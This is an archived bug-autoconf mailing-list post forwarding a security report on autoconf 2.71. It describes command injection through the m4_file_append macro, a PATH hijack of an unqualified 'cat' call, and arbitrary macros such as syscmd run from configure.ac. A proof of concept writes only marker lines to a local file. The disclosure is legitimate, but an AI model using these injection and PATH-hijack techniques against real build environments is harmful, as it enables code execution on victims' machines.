Fwd: [sr #110961] 3 Vulnerabilities Result in Code Execution upon runnin

bug-autoconf

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Fwd: [sr #110961] 3 Vulnerabilities Result in Code Execution upon runnin

From:	Ally Petitt
Subject:	Fwd: [sr #110961] 3 Vulnerabilities Result in Code Execution upon running `autoconf` with crafted `configure.ac` file
Date:	Sun, 26 Nov 2023 05:25:08 +0000

Please reply via email because it appears that I am unable to access this
support item through my account on https://savannah.gnu.org/support/?110961.

---------- Forwarded message ---------
From: anonymous <INVALID.NOREPLY@gnu.org>
Date: Sun, Nov 26, 2023 at 5:16 AM
Subject: [sr #110961] 3 Vulnerabilities Result in Code Execution upon
running `autoconf` with crafted `configure.ac` file
To: <allypetitt@gmail.com>, <bug-autoconf@gnu.org>

URL:
  <https://savannah.gnu.org/support/?110961>

                 Summary: 3 Vulnerabilities Result in Code Execution upon
running `autoconf` with crafted `configure.ac` file
                   Group: Autoconf
               Submitter: None
               Submitted: Sun 26 Nov 2023 05:16:39 AM UTC
                Category: None
                Priority: 5 - Normal
                Severity: 6 - Security
                  Status: None
                 Privacy: Private
             Assigned to: None
        Originator Email: allypetitt@gmail.com
             Open/Closed: Open
         Discussion Lock: Any
        Operating System: GNU/Linux

    _______________________________________________________

Follow-up Comments:

-------------------------------------------------------
Date: Sun 26 Nov 2023 05:16:39 AM UTC By: Anonymous
= Overview =

Arbitrary Code execution can be obtained up running `/usr/bin/autoconf`
when a
crafted `configure.ac` exploits any of the following 3 vulnerabilities:

*  Command injection in M4sugar due to lack of input sanitization (CWE-78).
*  `cat` command being executed without absolute path in M4sugar, leaving it
vulnerable to an untrusted PATH (CWE-427).
* Invocation of arbitrary m4 macros in `configure.ac`.

*Date*: 11/25/2023
*Researcher*: Ally Petitt
*Product Tested*: Autoconf v2.71 (it is highly likely this still exists in
more recent releases)
*Impact*: Remote code execution that leads to the loss of availability,
confidentiality, and integrity of the system. In certain cases it can also
lead to privilege escalation.

= Technical Details =

== M4sugar - Multiple Vulnerabilities ==
The `m4_file_append` macro is defined starting on line 3272 of
`lib/m4sugar/m4sugar.m4`.

m4_define([m4_file_append],
[m4_syscmd([cat >>$1 <<_m4eof
$2
_m4eof
])

This macro has 2 vulnerabilities. Proof-of-Concept examples of each will be
shown in the "PoC" section to provide both clarification and an easy way to
validate the issues.

1. The first vulnerability is that `cat` is called without an absolute path,
leaving it prone to modification of the $PATH environmental variable. A
privileged user on the system may set the $PATH to point to a directory they
control containing a malicious executable called `cat`. In scenarios where
`autoconf` has an SUID bit set or can otherwise be run with elevated
privileges, this can lead to privilege escalation.

*Mitigation*: Replace "cat" with "/usr/bin/cat" in the definition of
`m4_file_append`.

2. The arguments passed to `m4_file_append` are not sanitized before being
passed into `m4_syscmd`. This means that hackers can directly insert
malicious
code as an argument to the macro and it will be executed when `autoconf` is
ran!

*Mitigation*: If possible, implement a more secure way to append to a file
that does not involve running shell commands. I wish I could provide more
guidance here but I am not very proficient in m4. In the case that this is
not
feasible, treat `$1` and `$2` as untrusted input and sanitize them.

== Autoconf - Invocation of Arbitrary M4 Macros ==
Autoconf appears to execute m4 macros directly through the `configure.ac`
file. Without any sanitization, adversaries are able invoke arbitrary macros
including `syscmd` and the aforementioned vulnerable `m4_file_append`. This
can lead to the execution of code upon running `autoconf`. An example will
be
shown in the "PoC" section below.

It is worth noting that while executing macros is part of Autoconf's
functionality, I did not find evidence that the arbitrary execution of
commands was an intentional part of this design. As such, the lack of
restriction on the macros that can be called results in a larger attack
surface that can be taken advantage of by hackers.

*Mitigation*: Enforce a whitelist of macros that are able to be executed
from
`configure.ac`.

= PoC =

This Proof-of-Concept involves the creation of 4 files within the same
directory. The contents of these files are the following (file names are
commented at the top of each code block):

# congfigure.ac
AC_INIT([hello], [1.0])
AC_CONFIG_SRCDIR([hello.c])
AC_CONFIG_AUX_DIR([build-aux])
AC_PROG_CC

# Trigger the vulnerabilities by writing to a file called `vulns`
syscmd(echo vuln1 > vulns) # vuln1
m4_file_append(test, `echo vuln2 >> vulns`) # vuln2 and vuln3

AC_CONFIG_FILES([Makefile])
AC_OUTPUT

# Makefile.am
bin_PROGRAMS = hello
hello_SOURCES = hello.c

# hello.c
#include <stdio.h>
int main(int argc, char** argv) {
  printf("hello world!\n");
  return 0;
}

# cat
#!/bin/bash
echo vuln3 >> vulns

The resulting directory listing should be the following:

$ ls
cat  configure.ac  hello.c  Makefile.am

Once the files are verified to be correct, the 3 vulnerabilities can be
exploited by running the command below.

$ export PATH=$(pwd):$PATH && autoconf

A new file will be created called `vulns`. Each vulnerability that was
exploited wrote to this file to create the content below.

vuln1
vuln2
vuln3

Note that exploiting vulnerabilities 1 and 2 (the vulnerabilities that write
"vuln1" and "vuln2" to the `vulns` file, respectively) does not require the
$PATH environmental variable to be set and can simply be exploited with the
below command.

$ autoconf --force

These files are also included as a zip archive attached with this bug
report.

    _______________________________________________________
File Attachments:

-------------------------------------------------------
Date: Sun 26 Nov 2023 05:16:39 AM UTC  Name: poc.zip  Size: 1KiB   By: None

<http://savannah.gnu.org/support/download.php?file_id=55355>

    _______________________________________________________

Reply to this item at:

  <https://savannah.gnu.org/support/?110961>

_______________________________________________
Message sent via Savannah
https://savannah.gnu.org/

[Prev in Thread]

Current Thread

[Next in Thread]

[sr #110961] 3 Vulnerabilities Result in Code Execution upon running `autoconf` with crafted `configure.ac` file, anonymous, 2023/11/26
- Fwd: [sr #110961] 3 Vulnerabilities Result in Code Execution upon running `autoconf` with crafted `configure.ac` file, Ally Petitt <=
- Message not available
  - [sr #110961] 3 Vulnerabilities Result in Code Execution upon running `autoconf` with crafted `configure.ac` file, Paul Eggert, 2023/11/26
    - [sr #110961] 3 Vulnerabilities Result in Code Execution upon running `autoconf` with crafted `configure.ac` file, Zack Weinberg, 2023/11/27
    - [sr #110961] Arbitrary Code Execution upon running `autoconf` with crafted `configure.ac` file, Zack Weinberg, 2023/11/27

Prev by Date: [sr #110961] 3 Vulnerabilities Result in Code Execution upon running `autoconf` with crafted `configure.ac` file
Next by Date: [sr #110961] 3 Vulnerabilities Result in Code Execution upon running `autoconf` with crafted `configure.ac` file
Previous by thread: [sr #110961] 3 Vulnerabilities Result in Code Execution upon running `autoconf` with crafted `configure.ac` file
Next by thread: [sr #110961] 3 Vulnerabilities Result in Code Execution upon running `autoconf` with crafted `configure.ac` file
Index(es):
- Date
- Thread